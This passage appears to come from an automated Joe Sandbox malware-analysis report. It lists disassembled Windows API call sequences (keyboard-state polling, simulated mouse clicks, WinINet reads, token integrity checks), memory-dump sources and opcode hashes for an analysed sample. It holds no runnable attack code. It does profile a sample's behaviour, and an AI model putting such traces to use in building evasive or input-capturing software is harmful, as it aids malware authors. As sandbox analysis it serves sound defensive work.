                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00192262
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 0019230E
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00192316
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00192327
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0019232F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 755be65aacfd605ff60959d4cbf5891e6e0ff1e3f9d4906a244140f826a9de92
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8ce53de2923e2d0852d4e29eca578ae922d1aaa98fbb64b7841cec2fd5e7e0d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755be65aacfd605ff60959d4cbf5891e6e0ff1e3f9d4906a244140f826a9de92
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA31BF71900219EFDF14CFA8DD89ADE3BB5EB04315F114229F925A72D0C770E944DB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001ACC63,00000000), ref: 001AD97D
                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 001AD9B4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,001ACC63,00000000), ref: 001AD9F9
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,001ACC63,00000000), ref: 001ADA0D
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,001ACC63,00000000), ref: 001ADA37
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 460b0a97d21d6d12a7f382fde7781c004f41d6c99560a631007a9e0f77284186
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76b74110b8667ba1371ca5b9353371858ee4eb41c057ff504fd4c8e0cbe88dc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 460b0a97d21d6d12a7f382fde7781c004f41d6c99560a631007a9e0f77284186
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69319A75500B05EFDB24DFA5E884EABBBF8EB15354B10442EE506D3950DB30EE409B60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001C61E4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 001C623C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C624E
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C6259
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C62B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 007aee0249fbc5840bd756f6a47b19afa3c79a314dfb6fd79f1714a233f03578
                                                                                                                                                                                                                                                                                                          • Instruction ID: efffbf9872f827ab7c3c6ac431d64d33f47a850728253ee1ec2071c6b1b15a38
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007aee0249fbc5840bd756f6a47b19afa3c79a314dfb6fd79f1714a233f03578
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49219E759002189ADB209FA0DC84FEEBBB9FB64724F10421EF929EA181D770D985CF50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001B13AE
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001B13C5
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001B1401
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001B140D
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 001B1445
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2abf5f97085e9b2bb30abe688930a9e86eb79db7b35157fcd6dd861c982d67e2
                                                                                                                                                                                                                                                                                                          • Instruction ID: c0eae5dc889904584e20c3f49f7f4ba52c2f0571feb88e723989a6cbcbc4ca38
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2abf5f97085e9b2bb30abe688930a9e86eb79db7b35157fcd6dd861c982d67e2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71216A76600214AFD704EF69D899EAEBBE5EF59310B058439F85A97761DB30EC40CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0016D146
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0016D169
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0016D18F
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016D1A2
                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0016D1B1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c972e256b31fcfc841c0fc8d37cc5e0e611c6635980c28668e416db4433763c3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 216fc2677696eb9f2307f810c8277449ad3735e8784c00184544c35acb426688
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c972e256b31fcfc841c0fc8d37cc5e0e611c6635980c28668e416db4433763c3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD018476F016157F332166B67C8CD7B6EADEEC3BA13190129FD04C6244DBA08D1181B1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ae3c9800efbf1d62f4f00b3a264390705814f78cee76f69811790e168ae2a5c3
                                                                                                                                                                                                                                                                                                          • Instruction ID: d59e4f4023aec057a86b28ca41a6ab429658f05f0faf6b16a55dfdbcacf9a79c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae3c9800efbf1d62f4f00b3a264390705814f78cee76f69811790e168ae2a5c3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401B1B6604305BBDA1656249CC2FAB735D9E68399F094022FD0A9E341E761ED14C6B1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,0015F64E,0015545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00163170
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001631A5
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001631CC
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 001631D9
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 001631E2
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1dbaee793cdf0c6f4e5b1b1420ca1e61a59ab0dbf848dbf339d56527c19a6f2b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 787acb7ec81814452dbe12afa5868bbd4b4b64b7def5596731ef576728f48f2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dbaee793cdf0c6f4e5b1b1420ca1e61a59ab0dbf848dbf339d56527c19a6f2b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601C8B2644A006BD6126774AC89E3B2A6DAFE37B17220434FC35D21D1EF75CA325161
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?,?,00190C4E), ref: 0019091B
                                                                                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190936
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190944
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?), ref: 00190954
                                                                                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190960
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 27b7e7dc979dd542c0a063bb5a424e4a861d67f74deb6416ba2d749e9ba6a687
                                                                                                                                                                                                                                                                                                          • Instruction ID: b278e9e41760edbe7baa4698975486fbfadb6a9a657c81850fa191c1f5434192
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27b7e7dc979dd542c0a063bb5a424e4a861d67f74deb6416ba2d749e9ba6a687
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C018F72600204AFEB124F55EC44F9A7EADEB48759F140128FD09E2212D771DD80DBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0019F2AE
                                                                                                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0019F2BC
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0019F2C4
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0019F2CE
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6240f5b086e57142275739ba7c3e5808d94010e739cfd8e5116013fa6cd52780
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97b4c46d7314d7b00f715b437a1cd9792f951a769cd30482576874266c736519
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6240f5b086e57142275739ba7c3e5808d94010e739cfd8e5116013fa6cd52780
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4012971D01619EBCF00AFE4E849AEEBB78FB08711F06046AE502F2690DB349695C7A1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ebb68a3378c6c80a35019c3e57c4a54a6e6e66a09e622b9fda4b6fa7521752de
                                                                                                                                                                                                                                                                                                          • Instruction ID: ef0a0f6b10c71c84dbd66c21cfd50c9477510fb7268520075300dcec7385d001
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebb68a3378c6c80a35019c3e57c4a54a6e6e66a09e622b9fda4b6fa7521752de
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D70181B5601606BFDF114F65EC48E6A3F6EEF84364B210464F845C3360DB31DC80CA60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00191916
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00191922
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00191931
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00191938
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019194E
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 159dbaf6f6d9bb113c03c606f5140c2e5107294118dc9c178d75afda4119fae2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c53a584005ba256eefcb33789eb0869ce1ce95281ff1f65f8e62e4eafc29a71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 159dbaf6f6d9bb113c03c606f5140c2e5107294118dc9c178d75afda4119fae2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF04975200302BBDB210FA9AC49F563FADEF897A0F610424FE45D72A0CA70DC918A60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00191976
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00191982
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00191991
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00191998
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001919AE
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e69a25e82db95c5c3a33d9c64ecbbbeef48d851ec7c497d3cefbd1c69d4b4654
                                                                                                                                                                                                                                                                                                          • Instruction ID: 24b8862163a8eebe8e7680edbf8dca4ba4a77532eff929ccf1562b3755531da1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69a25e82db95c5c3a33d9c64ecbbbeef48d851ec7c497d3cefbd1c69d4b4654
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F06D75240302BBDB214FA9EC59F563FADFF897A0F610424FE45C72A0CB70E8918A60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CCB
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CD8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CE5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CF2
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CFF
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0D0C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 35ef6480d229fbd28aee7e8a84549fc2df13391e3279d702881990038d0a2ccf
                                                                                                                                                                                                                                                                                                          • Instruction ID: df613a98cf7395019a2c2dbcc784d28a6e637f871af6fb21f110a65b54e451ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ef6480d229fbd28aee7e8a84549fc2df13391e3279d702881990038d0a2ccf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301EEB6800B15DFCB31AFA6D880812FBF9BF503253108A3ED09352931C7B0A888CF80
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001965BF
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 001965D6
                                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001965EE
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0019660A
                                                                                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00196624
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3c5598d03df6ec96939bfd1a84ab1ea10a646d642e006a4dedfd273af2cd73d0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b4bc303c760cd9bc8dd2c09db6799c4ca5d59562454ca43e0af804f2a5486d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5598d03df6ec96939bfd1a84ab1ea10a646d642e006a4dedfd273af2cd73d0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E018130500714ABEF245F60EE4EF967BB8FB10705F010669B187A14E1EBF0AA84CAA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAD2
